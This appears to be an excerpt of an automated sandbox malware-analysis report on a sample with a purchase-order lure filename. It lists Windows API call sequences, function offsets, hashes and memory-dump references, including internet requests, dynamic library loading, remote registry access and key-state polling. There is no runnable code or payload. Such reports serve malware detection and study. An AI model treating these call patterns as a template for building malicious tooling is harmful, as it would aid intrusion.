                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem_memset
                        • String ID: 0
                        • API String ID: 1173514356-4108050209
                        • Opcode ID: 202a3d10f7f85aa3eb107b4c6e8e70735b895ab5808f64ee2a3eef67c3944a03
                        • Instruction ID: 3110e0b636cde32a103eac47affd1a4279c3ca09cd596dafc326a78a2089c1a2
                        • Opcode Fuzzy Hash: 202a3d10f7f85aa3eb107b4c6e8e70735b895ab5808f64ee2a3eef67c3944a03
                        • Instruction Fuzzy Hash: 8E41B2312187169FD711DF24C884F6AF7E8AF85358F04466DFB65972D1D7709820CB62
                        APIs
                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00310478
                          • Part of subcall function 002B7F40: _memmove.LIBCMT ref: 002B7F8F
                          • Part of subcall function 002BA2FB: _memmove.LIBCMT ref: 002BA33D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$BuffCharLower
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 2411302734-567219261
                        • Opcode ID: 17429aa46038a14f9b7946e316af0d4ade66f33a7d51b8da1e5abab9d9b0f3d0
                        • Instruction ID: a01d7ff2a90f0bbece1744d8488da75b93692245dd6eba632471c4bb4a30ac28
                        • Opcode Fuzzy Hash: 17429aa46038a14f9b7946e316af0d4ade66f33a7d51b8da1e5abab9d9b0f3d0
                        • Instruction Fuzzy Hash: F631F674514619AFCF09DF58C840AEEB3B6FF0A350F108629E4229B2D5DB71E955CF40
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002EC684
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002EC697
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 002EC6C7
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 458670788-1403004172
                        • Opcode ID: f67482ff32c28373eb5d58bae078b8739fbc4e3eb0952571c3bd272ebd6a1240
                        • Instruction ID: ce5103433cef0f516f8ef27cd81a698a0ba8cfef5c93eb777e40c79f7f2c985b
                        • Opcode Fuzzy Hash: f67482ff32c28373eb5d58bae078b8739fbc4e3eb0952571c3bd272ebd6a1240
                        • Instruction Fuzzy Hash: C6212371950144BFDB14AFA5C886DFFBBACDF81350F604119F422E71E0DBB48D2A9A10
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00304A60
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00304A86
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00304AB6
                        • InternetCloseHandle.WININET(00000000), ref: 00304AFD
                          • Part of subcall function 003056A9: GetLastError.KERNEL32(?,?,00304A2B,00000000,00000000,00000001), ref: 003056BE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 1951874230-3916222277
                        • Opcode ID: 91fc2fbd672fc7b418381cd0c291e664cfddd8afc5d820b7435644f6c1a3c96e
                        • Instruction ID: 16815c64e5a7e25ec43537724fd13ce7665e0a04c4c0210a7599b0e09c3024e8
                        • Opcode Fuzzy Hash: 91fc2fbd672fc7b418381cd0c291e664cfddd8afc5d820b7435644f6c1a3c96e
                        • Instruction Fuzzy Hash: E421CFB6641208BFEB12DFA59CD5EBBB6ECEB48744F10401AF60596180EA74CE059B70
                        APIs
                          • Part of subcall function 002CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                          • Part of subcall function 002CC619: GetStockObject.GDI32(00000011), ref: 002CC66B
                          • Part of subcall function 002CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00318F69
                        • LoadLibraryW.KERNEL32(?), ref: 00318F70
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00318F85
                        • DestroyWindow.USER32(?), ref: 00318F8D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                        • String ID: SysAnimate32
                        • API String ID: 4146253029-1011021900
                        • Opcode ID: 7f2244a30408e50d874e6bd23e72ebb47ddf4ab61d7d86019ab0a2b963f444d3
                        • Instruction ID: e14072419a4d6b27aa9a8bdae20f09ffd13fc513319f88078da642729922c73c
                        • Opcode Fuzzy Hash: 7f2244a30408e50d874e6bd23e72ebb47ddf4ab61d7d86019ab0a2b963f444d3
                        • Instruction Fuzzy Hash: B921B871600205AFEF164F64EC85EFB3BAEEB4D364F114628FA1497190CB31DCA29768
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 002F9E85
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F9EB6
                        • GetStdHandle.KERNEL32(0000000C), ref: 002F9EC8
                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002F9F02
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 77c7c779a875fb028a5e997fff8ad411e396676ce78c375fbbbb682523bfb42b
                        • Instruction ID: 40585f9893fca401b2ab033c710baa2254cd547cbc783352cd48059565f08493
                        • Opcode Fuzzy Hash: 77c7c779a875fb028a5e997fff8ad411e396676ce78c375fbbbb682523bfb42b
                        • Instruction Fuzzy Hash: 6921867051030A9FDB20DF25DC45BAAB7B8AF843A0F204A2AFAA5D71D0D77199A0CB50
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FE392
                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 002FE3E6
                        • __swprintf.LIBCMT ref: 002FE3FF
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0034DBF0), ref: 002FE43D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu
                        • API String ID: 3164766367-685833217
                        • Opcode ID: 39957004149786dd1763f0dc007b6d54f46965d681bbb9f6b1a14700639fc38b
                        • Instruction ID: b9091bd913467580cc8fb2e0f4ea7ef8512288387251d9332300064c26dd1235
                        • Opcode Fuzzy Hash: 39957004149786dd1763f0dc007b6d54f46965d681bbb9f6b1a14700639fc38b
                        • Instruction Fuzzy Hash: E8214F35A40109AFCB10EFA4D885DEEBBB8EF59714F104069F509EB251D771EA15CF90
                        APIs
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                          • Part of subcall function 002ED623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002ED640
                          • Part of subcall function 002ED623: GetWindowThreadProcessId.USER32(?,00000000), ref: 002ED653
                          • Part of subcall function 002ED623: GetCurrentThreadId.KERNEL32 ref: 002ED65A
                          • Part of subcall function 002ED623: AttachThreadInput.USER32(00000000), ref: 002ED661
                        • GetFocus.USER32 ref: 002ED7FB
                          • Part of subcall function 002ED66C: GetParent.USER32(?), ref: 002ED67A
                        • GetClassNameW.USER32(?,?,00000100), ref: 002ED844
                        • EnumChildWindows.USER32(?,002ED8BA), ref: 002ED86C
                        • __swprintf.LIBCMT ref: 002ED886
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                        • String ID: %s%d
                        • API String ID: 1941087503-1110647743
                        • Opcode ID: 16f14736592c8d5d739ccf9147c5e46e8047c63fb87501fff1b018d05ac1a474
                        • Instruction ID: d2a38366d62c0e9e9deba2e705db382b964666b63442853fa364ccfa5b5e0508
                        • Opcode Fuzzy Hash: 16f14736592c8d5d739ccf9147c5e46e8047c63fb87501fff1b018d05ac1a474
                        • Instruction Fuzzy Hash: F411E4755502056BDF11BF91DC86FEA376DAF44704F4040B9FE0CAA186CBB499558F70
                        APIs
                        • __lock.LIBCMT ref: 002D8768
                          • Part of subcall function 002D8984: __mtinitlocknum.LIBCMT ref: 002D8996
                          • Part of subcall function 002D8984: EnterCriticalSection.KERNEL32(002D0127,?,002D876D,0000000D), ref: 002D89AF
                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 002D8775
                        • __lock.LIBCMT ref: 002D8789
                        • ___addlocaleref.LIBCMT ref: 002D87A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                        • String ID: P3
                        • API String ID: 1687444384-1351901558
                        • Opcode ID: d10b4ab49c29126b973b30c0f50ec6f6596528bacb6eae08c715d7c3b76d2f92
                        • Instruction ID: a79c13351366972aa82d02cef66010760fb6eea8ab5f4975bf3c592abe1bd1b8
                        • Opcode Fuzzy Hash: d10b4ab49c29126b973b30c0f50ec6f6596528bacb6eae08c715d7c3b76d2f92
                        • Instruction Fuzzy Hash: C3016975425B009FE721EF75D80679AF7F0AF44325F20890EE0AA977A0DBB4AA50CF01
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003118E4
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00311917
                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00311A3A
                        • CloseHandle.KERNEL32(?), ref: 00311AB0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                        • String ID:
                        • API String ID: 2364364464-0
                        • Opcode ID: 630c2c9c2131e69da41466e4486355b8935bbc850f3d92e8b08a79aa1630d766
                        • Instruction ID: 58788749ad0d972bc1ac3ba7babe4db652511a0c9580c63ced2cf62f6a99996a
                        • Opcode Fuzzy Hash: 630c2c9c2131e69da41466e4486355b8935bbc850f3d92e8b08a79aa1630d766
                        • Instruction Fuzzy Hash: B3818670A50204ABDF259F64C886BEE7BF5AF48760F158059F905AF382DBB4E9508F90
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003105DF
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0031066E
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0031068C
                        • GetProcAddress.KERNEL32(00000000,?), ref: 003106D2
                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 003106EC
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,002FAEA5,?,?,00000000,00000008), ref: 002CF282
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,002FAEA5,?,?,00000000,00000008), ref: 002CF2A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                        • String ID:
                        • API String ID: 327935632-0
                        • Opcode ID: e0a9900dea79edfdda8a7840ae04b3198dbbaf2c05f3fb4b10a5a1af423b3b57
                        • Instruction ID: b11e8f895e2ed6d8240cb9fbc40bb1c3237958f65a9ad840b708878da13a6604
                        • Opcode Fuzzy Hash: e0a9900dea79edfdda8a7840ae04b3198dbbaf2c05f3fb4b10a5a1af423b3b57
                        • Instruction Fuzzy Hash: 38516775A002059FCB09EFA8C8909EDB7B9EF4C310F158065E956AB352DB74ED95CF80
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00312DE0
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00312E1F
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00312E66
                        • RegCloseKey.ADVAPI32(?,?), ref: 00312E92
                        • RegCloseKey.ADVAPI32(00000000), ref: 00312E9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                        • String ID:
                        • API String ID: 3440857362-0
                        • Opcode ID: a9cd4d9ce9137be0112059af28e062ad07239a263504de7ca4f8a50a1f655ab1
                        • Instruction ID: 9f541a46c18652b348de207428526e06dc8a8f74c6faa0223d3dd7904f40d7ab
                        • Opcode Fuzzy Hash: a9cd4d9ce9137be0112059af28e062ad07239a263504de7ca4f8a50a1f655ab1
                        • Instruction Fuzzy Hash: 4F519D31218205AFC709EF64C881EABB7E9FF88744F10481EF5958B2A1DB31E965CF52
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6dcf7f8e8aa2b597d123e377cbd33e1ba24786fcf97d16222bcd300068def2e1
                        • Instruction ID: af3ca892c7bd691b754c968868966403fb2ac3f78454aa2f97d119a0f7c0b96e
                        • Opcode Fuzzy Hash: 6dcf7f8e8aa2b597d123e377cbd33e1ba24786fcf97d16222bcd300068def2e1
                        • Instruction Fuzzy Hash: 24413436954104BFC72ADB68CC89FE9BB68EB0D320F169255F819E72E0C7309D81D690
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003017D4
                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003017FD
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0030183C
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00301861
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00301869
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                        • String ID:
                        • API String ID: 1389676194-0
                        • Opcode ID: 0e0d2b300c7e6f651fd4bb3e2f7a3fa9eb359ecf6180009268e2da271b1715dc
                        • Instruction ID: 5299f45fca37106e3ff684cd6ea7444a665e8d21297b1ec499a6b5afd33ea865
                        • Opcode Fuzzy Hash: 0e0d2b300c7e6f651fd4bb3e2f7a3fa9eb359ecf6180009268e2da271b1715dc
                        • Instruction Fuzzy Hash: 06411935A10205DFCB15EF64C991EAEBBF9EF08350B148099E909AB362DB31ED11DF50
                        APIs
                        • GetCursorPos.USER32(000000FF), ref: 002CB749
                        • ScreenToClient.USER32(00000000,000000FF), ref: 002CB766
                        • GetAsyncKeyState.USER32(00000001), ref: 002CB78B
                        • GetAsyncKeyState.USER32(00000002), ref: 002CB799
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: fbee247cfc4440a725ee688bf7bd3502f0c2d15d45bcb79c8bad95d7c40c620b
                        • Instruction ID: 739fb7f9b5fe32231817b0961d81a964f53e92f64c42638613caab1db8e43431
                        • Opcode Fuzzy Hash: fbee247cfc4440a725ee688bf7bd3502f0c2d15d45bcb79c8bad95d7c40c620b
                        • Instruction Fuzzy Hash: 08417F32504519FFDF1A9F64D885EE9FBB4BB45320F204319F829962D0C730A9A4DF90
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 002EC156
                        • PostMessageW.USER32(?,00000201,00000001), ref: 002EC200
                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002EC208
                        • PostMessageW.USER32(?,00000202,00000000), ref: 002EC216
                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002EC21E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: 5c0bb888605bea32272cf908f373212a155966b82bf5d848e29c80b452f5c953
                        • Instruction ID: afbf3cc3f44ac18db441387cc08c9285e0be72da329ef4ceea77cae0e6f57550
                        • Opcode Fuzzy Hash: 5c0bb888605bea32272cf908f373212a155966b82bf5d848e29c80b452f5c953
                        • Instruction Fuzzy Hash: B431F17190025AEBDF04CFB9DD4DA9E3BB5EF04315F604224F824AB1D1C3B09911DB90
                        APIs
                        • IsWindowVisible.USER32(?), ref: 002EE9CD
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002EE9EA
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002EEA22
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002EEA48
                        • _wcsstr.LIBCMT ref: 002EEA52
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
